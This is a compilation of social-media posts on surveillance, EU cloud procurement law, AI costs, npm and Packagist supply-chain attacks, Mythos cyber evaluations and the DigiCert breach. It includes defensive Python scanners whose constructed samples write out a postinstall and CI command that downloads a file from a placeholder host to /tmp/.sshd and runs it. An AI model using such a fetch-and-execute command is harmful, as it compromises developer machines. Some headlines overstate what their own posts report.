🦔Leonardo is a $17 billion defense contractor. It built a system called SignalTrace that clips sensors onto the license plate readers already mounted on street poles, overpasses, and police cars across the US. Every time you drive past one, the sensor grabs the Bluetooth and WiFi signals from every device in your car, ties them to your plate, and logs the time and location. Your phone, your AirPods, your kid's tablet. All of it goes into the same file. A friend rides with you once and their devices are linked to your plate.
Leonardo has sold this to police departments since at least 2023. There is no federal law covering it, no opt-out, and no warrant requirement.
My Take
None of the pieces here are new. Your phone has always broadcast a signal. The license plate cameras were already there. Leonardo just connected them and found a buyer. Nobody had to break a law or build anything from scratch. They assembled a surveillance system from parts already in place and sold it before anyone noticed.
Most people found out this week from a 404 Media investigation. Leonardo received the patent in 2024. By the time you hear about something like this, the deals are done and the sensors are on the poles. That's how it works now.
Hedgie🤗
https://t.co/serZi0IGnT
Today the EU made American AI illegal in 27 countries.
The reason is ONE sentence Microsoft's own lawyer said under oath:
This morning in Brussels, EU Tech Chief Henna Virkkunen unveiled the Cloud and AI Development Act. It's the most aggressive anti-American tech move from Europe since GDPR.
The law forces EU public sector procurement in banking, healthcare, defense, and energy to apply mandatory non-price factors favoring software and hardware built inside the EU. Microsoft Azure can be cheaper, AWS can be faster, Google Cloud can have the better model, and EU governments MUST legally prefer European alternatives.
AWS, Microsoft, and Google currently control roughly 70% of the European cloud market. Brussels is now openly targeting greater independence from US providers in cloud, AI, and semiconductors.
The largest regulatory market-share transfer in tech history is being written into law right now.
But the real story is how this happened...
On June 10, 2025, a man almost no one outside Brussels had heard of walked into the French Senate. His name is Anton Carniaux, Director of Public and Legal Affairs at Microsoft France.
Senator Dany Wattebled asked him under oath whether he could guarantee that data belonging to French citizens, stored on Microsoft European servers, would never be transmitted to US authorities without explicit consent from the French government.
Carniaux answered honestly. He admitted he could not guarantee it, because Microsoft must comply with the US CLOUD Act regardless of where European data physically sits. One sentence of sworn testimony from Microsoft's own counsel killed every sovereign cloud defense Big Tech had spent five years building.
It became the legal foundation for the law unveiled today.
Then Trump accelerated the divorce.
January 2025 brought executive orders expanding US surveillance authorities. Vance went to Munich and attacked European democracies on stage.
The tariffs followed and so did the Pentagon's $200 million AI contract war that ended with OpenAI replacing Anthropic after Hegseth labeled it a supply chain risk. So did OpenAI's Stargate and yesterday's Trump AI Executive Order, whose Section 3 lets the White House pick which AI companies get 30-day early access to frontier models. American AI was officially declared a US government strategic asset.
Europe heard every word of it.
On May 12, Mistral CEO Arthur Mensch told the French National Assembly that Europe had 24 months to build sovereign AI infrastructure or become a permanent US VASSAL state.
And the response came fast:
April 24: Cohere acquired Germany's Aleph Alpha for $20 billion with both Germany's and Canada's digital ministers in the room at the Berlin announcement. May 30: SoftBank committed up to $87 BILLION for French nuclear-powered data centers, the largest AI infrastructure project in European history.
Yesterday: EU Parliament announced it's dropping Google for French search engine Qwant tomorrow. France ordered every government workstation off Windows and onto Linux.
Today the Cloud and AI Development Act made all of it law.
- Mistral is building a 1.4 gigawatt AI campus near Paris by 2028 with Nvidia, MGX, and Bpifrance
- SAP's EU AI Cloud, launched last November, runs on Cohere, Mistral, and SAP's own sovereign infrastructure
- McKinsey forecasts $600 billion in sovereign AI needs by 2030
None of that money is going to Silicon Valley.
The America First AI policy built a wall around the world's most regulated economy, and American companies are on the wrong side of it.
Microsoft's lawyer told the truth in a Senate hearing nobody watched. Trump turned that admission into a national security narrative while the EU turned that narrative into procurement law.
And one entire continent walked away from the American tech stack...
CEOs are quietly realizing the AI replacement plan has a problem.
Two problems, actually.
One: the token costs for running AI agents are now exceeding what they were paying the employees they fired.
Two: when the tokens run out, the AI stops. Just stops. No continuity. No workaround. Just a spinning wheel where your workforce used to be.
You fired humans to save money and bought a subscription that bills you into a corner.
The employees you let go knew what to do when things broke.
The AI just invoices you for the outage.
And then there’s the permission problem nobody wants to talk about.
To do its job, the AI agent needs access. Full access. Your systems, your patents, your contracts, your future plans. Everything you spent years building, handed over to a process that has no loyalty, no discretion, and no skin in the game.
You didn’t hire a replacement.
You gave a stranger with no soul the keys to everything you own.
Enjoy.
Uber’s COO has said that it’s getting “harder to justify” its AI costs because there was no way to show a link between AI spend and any meaningful increase in useful features. This is the first time I’ve seen a company say this directly.
https://t.co/xUhZvtpwah
Today we're open-sourcing Bumblebee, a read-only scanner for macOS and Linux.
It checks developer machines for risky packages, extensions, and AI tool configs.
Connected to Computer, it can trigger deeper scans whenever a new supply-chain risk emerges.
https://t.co/FOaWnF1yQy
‼️🚨 BREAKING: Another supply chain attack. 700+ GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages.
8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies.
The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected.
IOCs:
- GitHub account parikhpreyash4
- repo systemd-network-helper-aa5c751f
- drop path /tmp/.sshd
- command fragments curl -skL and chmod +x /tmp/.sshd
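A defender-side check for the pattern this post describes, added here as an example (not the post's or any vendor's code): it scans the npm lifecycle scripts in a package.json, which is where the post says the script was hidden even in PHP projects, and the `run:` lines of a GitHub Actions workflow for the indicators listed above. The sample package.json and workflow are constructed, and PLACEHOLDER.invalid is not a real host.

```python
"""Added example: flag install-time scripts and CI steps that match the
indicators above. Sample inputs are constructed; the URL is a placeholder."""
import json
import re

# Indicators taken from the post; the regexes generalise them (assumption).
INDICATORS = [
    ("insecure curl download", re.compile(r"\bcurl\b.*(\s-[a-zA-Z]*k|--insecure)")),
    ("drop to hidden /tmp binary", re.compile(r"/tmp/\.[A-Za-z0-9_-]+")),
    ("chmod +x on /tmp payload", re.compile(r"chmod\s+\+x\s+/tmp/\.")),
    ("errors suppressed", re.compile(r"2>\s*/dev/null")),
]
# npm scripts that run automatically during install, not only on `npm run`.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")


def scan_command(cmd):
    """Names of the indicators present in one shell command string."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def scan_package_json(text):
    """[(script_name, [indicators])] for lifecycle scripts that hit."""
    scripts = json.loads(text).get("scripts", {})
    return [(n, scan_command(scripts[n])) for n in LIFECYCLE
            if n in scripts and scan_command(scripts[n])]


def scan_workflow(text):
    """Flag the fake step name and any run: line that hits the indicators."""
    hits = []
    if "Dependency Cache Sync" in text:
        hits.append(("step name", ["known fake step 'Dependency Cache Sync'"]))
    for m in re.finditer(r"run:\s*(.+)", text):
        found = scan_command(m.group(1))
        if found:
            hits.append(("run", found))
    return hits


# Constructed samples mirroring the fragments in the post.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "constructed-sample",
    "scripts": {
        "build": "vite build",
        "postinstall": "curl -skL https://PLACEHOLDER.invalid/x -o /tmp/.sshd "
                       "2>/dev/null && chmod +x /tmp/.sshd",
    },
})
SAMPLE_WORKFLOW = """jobs:
  build:
    steps:
      - name: Dependency Cache Sync
        run: curl -skL https://PLACEHOLDER.invalid/x -o /tmp/.sshd && chmod +x /tmp/.sshd
      - run: npm ci
"""

if __name__ == "__main__":
    print(scan_package_json(SAMPLE_PACKAGE_JSON))
    print(scan_workflow(SAMPLE_WORKFLOW))
```

Run it over every package.json in a checkout (including PHP projects) and over .github/workflows/*.yml; a hit on a lifecycle script is worth a manual read before the next install.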
@github We opened up AgentMesh for free. It’s like VirusTotal, but for extensions, skills, etc. (https://t.co/BcrPb9DUes) You can also check out how we secure coding agents if you like. Free up to 5 licenses. https://t.co/BsCxIZ8zQO
🚨 BREAKING: Socket is investigating an active npm supply chain attack compromising hundreds of packages in the @antv ecosystem.
The malicious publish wave appears tied to Mini Shai-Hulud and packages connected to the npm maintainer account atool.
Atlassian's revenue: $1.79 billion last quarter
Atlassian's move: fire the engineer who built their infrastructure
his move: post a 38-minute breakdown of every system he built, free for anyone to copy
what he revealed:
> Envoy proxy instead of enterprise load balancers
> sidecar architecture for auth, logging, rate limits
> DynamoDB + SQS for async provisioning
> Packer + SaltStack for automated VM deployments at scale
Atlassian charges per employee across 350,000 customers
this guy just handed you the enterprise playbook for free
save this
A lot of people have been wondering about Mythos, Glasswing, and the vulns we / our partners are fixing. Today, I’m excited for us to start sharing more. (For context, I lead Glasswing @AnthropicAI.)
Two independent evaluations this week—from XBOW and the UK AISI—confirm what we've been seeing internally: Claude Mythos Preview is a step change in autonomous cybersecurity capabilities. We need to start preparing fast for a world of models with this level of capabilities.
The UK AI Security Institute tested the model we shipped at the launch of Project Glasswing and found Mythos Preview is the first model to solve both of their end-to-end cyber ranges, including one (Cooling Tower) which no model had ever cleared. But attackers (and defenders) have sophistication & cost constraints – Mythos is also the only model that clears every one of their tasks estimated over 8 hours under their deliberately low 2.5M-token cap.
XBOW tested it on their offensive security benchmarks, finding "token-for-token, unprecedented precision." It's the only model to succeed at subtle V8 sandbox work.
Other Glasswing partners shared similar stories. In a few weeks of testing, Mythos Preview has helped them find many thousands of (estimated) high + critical severity vulnerabilities, sometimes double what they'd normally find in a year.
I don't share this to boost Mythos. In fact, this is not about Mythos. It’s about preparing for the coming world of models being better, faster, cheaper, and more creative than some of the best human experts at dual use capabilities. Clearly, we need them supporting defenders as widely as can be done safely – and especially the least resourced ones.
Within a year, Mythos will probably look quite dumb (relative to other new models). And others may release openly available or unguardrailed models of Mythos-level capabilities.
We started Project Glasswing because capabilities like Mythos Preview's won't stay rare, or stay in careful hands. We are bringing it to defenders as fast as we responsibly can, while working to figure out, for example, the right safeguards and patching & disclosure processes.
Also, to be clear, compute has never been a limiter in our rollout.
Expect a fuller update on our Glasswing work in the coming days.
XBOW report: https://t.co/Mumtbf3kE3
UK AISI report: https://t.co/vBgqz0AeKJ
‼️🚨 MAJOR IMPACT: AI just found an 18-year-old NGINX critical remote code execution vulnerability. It has been disclosed on GitHub including PoC code.
- Affects NGINX 0.6.27 through 1.30.0
- Triggered via the rewrite and set directives in config
- Update NGINX ASAP
- NGINX is a widely used HTTP web server, be sure to check its prevalence in other products
‼️🚨 One of the world's largest Certificate Authorities, DigiCert, was compromised by a malicious screensaver file sent through a customer support chat. Their antivirus blocked the malware four times. The agent kept clicking. The fifth try got through.
27 code signing certificates were stolen and used to sign malware.
DigiCert ultimately revoked 60 certificates.
Per DigiCert's incident report, filed in Mozilla's CA compliance tracker as Bug 2033170, here is how it unfolded:
April 2: an attacker contacted a DigiCert helpdesk agent through the company's customer support chat channel, posing as a customer. The lure was a zip file pitched as a screenshot. Inside the zip was a .scr file. On Windows, .scr files are executables, and this one carried a malicious payload.
Opening a file a customer sent through the official support channel is what an agent is supposed to do. Support staff are the one role designed to accept files from strangers.
DigiCert's endpoint security blocked four infection attempts. On the fifth, the support analyst's machine was infected.
DigiCert detected the infection, ran an investigation, and concluded the incident was contained.
Eleven days later, an external researcher tipped DigiCert off about misuse of DigiCert-issued code signing certificates in the wild. That tip led to the discovery of a second compromised machine, belonging to a different support analyst, infected through the same vector. The EDR on that machine had not been functioning correctly, so the original investigation missed it.
The second machine gave the attacker access to DigiCert's internal support portal. That portal lets support staff reach limited views of customer accounts, including initialization codes for ordered but not-yet-issued code signing certificates. Combining a stolen initialization code with an approved order let the attacker pull a real, validly issued code signing certificate. They did this 27 times.
DigiCert's own list of what went wrong:
- File-type filtering on the customer support chat channel did not catch the .scr
- EDR coverage was inconsistent and incomplete, creating a blind spot
- Initialization codes for code signing certificates were not adequately protected
DigiCert says it got lucky. An outside researcher found the malware abuse before DigiCert did. Without that tip, the second machine and the active certificate theft might still be running today.
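An added example, not DigiCert's code, of the file-type check the report says was missing on the support channel: it opens a zip "screenshot" in memory and flags entries with Windows-executable extensions such as .scr, including double extensions like screenshot.png.scr, and entries whose first bytes are a PE header regardless of name. The zip and its contents are constructed, and the extension list is an assumed default rather than DigiCert's policy.

```python
"""Added example: inspect a zip attachment before a support agent opens it.
The sample zip is constructed in memory; the extension list is assumed."""
import io
import zipfile

# Extensions Windows runs directly when double-clicked (assumed default list).
EXECUTABLE_EXTS = {".scr", ".exe", ".com", ".pif", ".bat", ".cmd",
                   ".vbs", ".js", ".ps1", ".msi", ".hta"}
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}


def classify_name(name):
    """Reason string if the entry name is suspicious, else None."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return None
    ext = "." + parts[-1]
    if ext not in EXECUTABLE_EXTS:
        return None
    if len(parts) > 2 and "." + parts[-2] in IMAGE_EXTS:
        return "executable %s disguised with image extension" % ext
    return "executable extension %s" % ext


def inspect_zip(data):
    """(is_blocked, [(entry, reason)]) for raw zip bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reason = classify_name(info.filename)
            if reason is None:
                # Name looks harmless: still check for a PE ("MZ") header.
                with zf.open(info) as fh:
                    if fh.read(2) == b"MZ":
                        reason = "PE header behind non-executable name"
            if reason:
                findings.append((info.filename, reason))
    return bool(findings), findings


def build_sample():
    """Constructed lure: a 'screenshot' zip carrying a .scr with a fake PE stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("screenshot.png.scr", b"MZ" + b"\x00" * 62)
        zf.writestr("notes.txt", b"constructed benign file")
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_zip(build_sample()))
```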
A new npm supply-chain compromise is targeting SAP developer workflows.
Mini Shai-Hulud follows a familiar pattern, but with a smaller package set and a serious secret-stealing payload built to hit developer machines and CI/CD environments.
Affected packages we’re tracking:
- cap-js/sqlite v2.2.2
- cap-js/postgres v2.2.2
- cap-js/db-service v2.10.1
- mbt v1.2.48
If any of these touched your environment, rotate secrets and review GitHub, npm, cloud, and CI activity.